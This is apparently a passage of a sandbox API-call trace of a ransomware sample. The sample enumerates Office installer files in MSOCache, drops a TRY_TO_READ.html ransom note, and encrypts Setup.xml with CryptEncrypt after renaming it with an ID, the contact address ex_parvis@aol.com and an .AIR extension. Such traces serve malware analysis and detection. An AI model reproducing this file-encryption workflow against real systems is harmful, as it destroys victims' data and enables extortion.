nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.638] GetLastError () returned 0x0 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.638] GetLastError () returned 0x0 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0151.638] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.638] GetLastError () returned 0x0 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.638] GetLastError () returned 0x0 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0151.639] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.639] GetLastError () returned 0x0 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.639] GetLastError () returned 0x0 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385770 [0151.639] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.639] GetLastError () returned 0x0 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.639] GetLastError () returned 0x0 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x31d0048 [0151.640] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.640] GetLastError () returned 0x0 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.640] GetLastError () returned 0x0 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385818 [0151.640] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.640] GetLastError () returned 0x0 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.640] GetLastError () returned 0x0 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3858c0 [0151.641] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.641] GetLastError () returned 0x0 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.641] GetLastError () returned 0x0 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385968 [0151.641] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.641] GetLastError () returned 0x0 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.641] GetLastError () returned 0x0 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385a10 [0151.642] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.642] GetLastError () returned 0x0 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.642] GetLastError () returned 0x0 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385ab8 [0151.642] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97242fd0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.642] GetLastError () returned 0x0 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.642] GetLastError () returned 0x0 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0151.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0151.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.643] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97242fd0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0151.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385b60 [0151.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0151.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0151.643] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0151.643] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0151.643] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0151.644] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0151.644] GetProcessHeap () returned 0x2e0000 [0151.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x31d0110 [0151.644] lstrcpyW (in: lpString1=0x31d0110, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" [0151.644] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0151.644] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0151.647] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0151.647] GetProcessHeap () returned 0x2e0000 [0151.647] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0110 | out: hHeap=0x2e0000) returned 1 [0151.647] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=16683) returned 1 [0151.647] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x412b [0151.647] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0151.647] GetProcessHeap () returned 0x2e0000 [0151.647] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0151.647] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0151.647] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0151.649] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0151.649] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.649] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x412b) returned 0x3a7410 [0151.649] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x412b) returned 0x3ab548 [0151.649] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.649] ReadFile (in: hFile=0x4a8, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x412b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x412b, lpOverlapped=0x0) returned 1 [0151.650] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-16683, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.650] WriteFile (in: hFile=0x4a8, lpBuffer=0x3ab548*, nNumberOfBytesToWrite=0x412b, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ab548*, lpNumberOfBytesWritten=0x2acf9c8*=0x412b, lpOverlapped=0x0) returned 1 [0151.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0151.653] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ab548 | out: hHeap=0x2e0000) returned 1 [0151.653] CloseHandle (hObject=0x4a8) returned 1 [0151.654] GetProcessHeap () returned 0x2e0000 